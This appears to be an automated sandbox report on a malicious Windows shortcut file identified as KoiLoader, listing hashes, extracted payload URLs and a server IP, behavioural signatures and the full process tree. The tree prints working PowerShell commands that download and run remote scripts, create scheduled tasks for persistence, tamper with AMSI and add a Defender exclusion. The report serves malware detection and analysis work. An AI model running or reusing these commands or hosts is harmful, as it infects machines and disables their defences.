Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 11:14
Static task
static1
Behavioral task
behavioral1
Sample
22_11_2024_stmnt.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
22_11_2024_stmnt.lnk
Resource
win10v2004-20241007-en
General
-
Target
22_11_2024_stmnt.lnk
-
Size
3KB
-
MD5
ef8150f41db3c25684ff13470182898f
-
SHA1
6a10b98d8cd2fb0fa641d282ea30fc196638b8cd
-
SHA256
e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b
-
SHA512
d7937781c09595c1b0c4a058929579a7499b7e28c67ef48f3ab6704a4c3b2b80cea38a1452f275e0b1205ddbabeeceaadf3c3fcd84be8fb6270904859eeff6c3
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
koiloader
http://195.123.217.43/oversate.php
-
payload_url
https://www.italialife24.it/wp-content/uploads/2021/05
Signatures
-
Koiloader family
-
Detects KoiLoader payload 2 IoCs
resource yara_rule behavioral2/memory/4776-56-0x0000000007BD0000-0x0000000007BDD000-memory.dmp family_koi_loader behavioral2/memory/4188-135-0x0000000007EE0000-0x0000000007EED000-memory.dmp family_koi_loader -
Blocklisted process makes network request 9 IoCs
flow pid Process 7 4060 powershell.exe 39 4144 powershell.exe 40 4776 powershell.exe 41 4776 powershell.exe 46 3876 powershell.exe 47 3876 powershell.exe 53 400 powershell.exe 54 4188 powershell.exe 55 4776 powershell.exe -
pid Process 3876 powershell.exe 4776 powershell.exe 4188 powershell.exe 4836 powershell.exe 4060 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4144 powershell.exe 400 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4060 powershell.exe 4060 powershell.exe 4144 powershell.exe 4144 powershell.exe 4776 powershell.exe 4776 powershell.exe 4836 powershell.exe 4836 powershell.exe 3876 powershell.exe 3876 powershell.exe 400 powershell.exe 400 powershell.exe 4188 powershell.exe 4188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2452 wrote to memory of 4060 2452 cmd.exe 83 PID 2452 wrote to memory of 4060 2452 cmd.exe 83 PID 4060 wrote to memory of 1908 4060 powershell.exe 84 PID 4060 wrote to memory of 1908 4060 powershell.exe 84 PID 3040 wrote to memory of 4144 3040 wscript.EXE 95 PID 3040 wrote to memory of 4144 3040 wscript.EXE 95 PID 4144 wrote to memory of 4676 4144 powershell.exe 97 PID 4144 wrote to memory of 4676 4144 powershell.exe 97 PID 4144 wrote to memory of 452 4144 powershell.exe 98 PID 4144 wrote to memory of 452 4144 powershell.exe 98 PID 452 wrote to memory of 4776 452 wscript.exe 99 PID 452 wrote to memory of 4776 452 wscript.exe 99 PID 452 wrote to memory of 4776 452 wscript.exe 99 PID 3192 wrote to memory of 3424 3192 DllHost.exe 102 PID 3192 wrote to memory of 3424 3192 DllHost.exe 102 PID 3192 wrote to memory of 3424 3192 DllHost.exe 102 PID 3424 wrote to memory of 4836 3424 cmd.exe 104 PID 3424 wrote to memory of 4836 3424 cmd.exe 104 PID 3424 wrote to memory of 4836 3424 cmd.exe 104 PID 4776 wrote to memory of 2104 4776 powershell.exe 105 PID 4776 wrote to memory of 2104 4776 powershell.exe 105 PID 4776 wrote to memory of 2104 4776 powershell.exe 105 PID 2104 wrote to memory of 3876 2104 cmd.exe 107 PID 2104 wrote to memory of 3876 2104 cmd.exe 107 PID 2104 wrote to memory of 3876 2104 cmd.exe 107 PID 3544 wrote to memory of 400 3544 wscript.EXE 109 PID 3544 wrote to memory of 400 3544 wscript.EXE 109 PID 400 wrote to memory of 1484 400 powershell.exe 111 PID 400 wrote to memory of 1484 400 powershell.exe 111 PID 400 wrote to memory of 3112 400 powershell.exe 112 PID 400 wrote to memory of 3112 400 powershell.exe 112 PID 3112 wrote to memory of 4188 3112 wscript.exe 114 PID 3112 wrote to memory of 4188 3112 wscript.exe 114 PID 3112 wrote to memory of 4188 3112 wscript.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl03⤵
- Scheduled Task/Job: Scheduled Task
PID:1908
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\82TWC4RM7FWJ.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\82TWC4RM7FWJ.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f3⤵PID:4676
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\82TWC4RM7FWJ.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zLC8EDURA8S'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\82TWC4RM7FWJ.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\82TWC4RM7FWJ.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f3⤵PID:1484
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\82TWC4RM7FWJ.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zQNP3RE12OE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\ra63d6fdc-08cb-4232-ab51-76cafdcb4d96r.js"1⤵PID:4612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ff72f9315b5bdfc7f1a9aabb6565450c
SHA1ea12c1c21808bed3d8e8d8da431c2f44d6e76c5b
SHA256bcc985d6dccfbb17bec2c0ee8251cc2a3bf454e81b99f5d9e6e3daa7c54906dd
SHA512f87c2897d5833efa8e28742c32dda62e8aeca4eff160230a8424235d338eb8a74a942dda1dc0ac33777bf608b2e0a17035e7c2c82a8c35ee061115de8f124ed5
-
Filesize
1KB
MD537c3bfbf0b15c74a8988fdecf7d4e9fd
SHA10a51699bafb3515022018f2265950ac0ed108830
SHA25658eaebe9f420fef9424e6e2aa7fb8fc967877e65e1d3989ddf689cbd91e26e29
SHA512adf05bcff064d44094756a6c5c87eb985b58a52df6e722f19e1345cab8dff426c66278d94db84042915585f01b7d460990cd9cd23caf46ac12fec383aef5536f
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
793B
MD58dbf9765856ef5b87ec2af8f812da256
SHA10d8ab7ddbb6cf24063a8d2f627b12b2eb9148af1
SHA2569a79539cb17bc5af14528e61a0ae4a4965fe89eeab054786ddf035f5bc9878c5
SHA512b988a480622756c2a0e69fcde343cda31def310cdd83ce7e43059717af60e02a5e440d7199d5b2bffaefc285fc76f11fc3c571cb1d50154e2412d0d005764d00
-
Filesize
19KB
MD5482e31f3cca1deeebb0465b823fca387
SHA1c8a79bc2b3e7d4683e32b2219e6e657097489114
SHA25609550cb22511edd50432941cb45cbe03697a3938fa3dddd9a68fb1987d2d4b67
SHA5121bfe82bb78b6fb0982f2e4125527c69ccc03d6c6cbb526ae8a2963e5f220fe9392f7322ade390dc513148169319008d8e268e84557c814a96d066940b0c32676
-
Filesize
1KB
MD5477031a32089e6d066092d640b526add
SHA15041602c7c71b4c6e40928039dcc07b6b32a67f2
SHA2560ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef
SHA51201388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e
-
Filesize
1KB
MD5fc28168b916bf9744961653d503e1164
SHA171deadab13b81a414582f931e9af010152463644
SHA256a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9
SHA51208d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
304B
MD5b1b54dfa13d8ae43ddeaf5124e995370
SHA194275e37076b1b20fac96f871e8f177be745a823
SHA25607cc2bca34dcbbdc4711e9ffca9731f9342e22bca4620cff60765a1a8747a523
SHA5128928ebb41fe5afa3adff06235a919361528d901a04c9b5120f834f69eccec4cb16848330a95a4471d413d263045f2f557b2b13432eb553e0bb0635753ebe097b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82